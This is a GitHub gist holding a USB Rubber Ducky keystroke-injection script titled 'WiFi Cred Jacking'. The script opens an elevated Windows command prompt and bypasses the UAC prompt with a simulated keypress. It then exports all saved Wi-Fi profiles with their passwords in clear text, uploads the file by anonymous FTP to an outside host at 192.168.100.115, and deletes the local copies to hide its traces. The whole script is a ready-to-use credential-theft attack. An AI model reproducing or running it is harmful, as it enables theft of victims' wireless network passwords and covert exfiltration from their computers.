Skip to content

Instantly share code, notes, and snippets.

@j105rob
Created September 1, 2013 11:21
Show Gist options
  • Save j105rob/6403843 to your computer and use it in GitHub Desktop.
Save j105rob/6403843 to your computer and use it in GitHub Desktop.
WiFi Cred Jacking w/ Rubber Ducky
REM #### win 7 bits upload wlan keys
DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
ALT y
DELAY 400
STRING netsh wlan export profile folder=%USERPROFILE%\ key=clear
ENTER
DELAY 200
STRING copy /b /Y %USERPROFILE%\*.xml %USERPROFILE%\wipass.xml
ENTER
STRING echo put %USERPROFILE%\wipass.xml uploads/wipass.xml|ftp -A 192.168.100.115
ENTER
DELAY 2200
STRING quit
ENTER
STRING erase /Q %USERPROFILE%\*.xml
ENTER
DELAY 200
STRING exit
ENTER
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment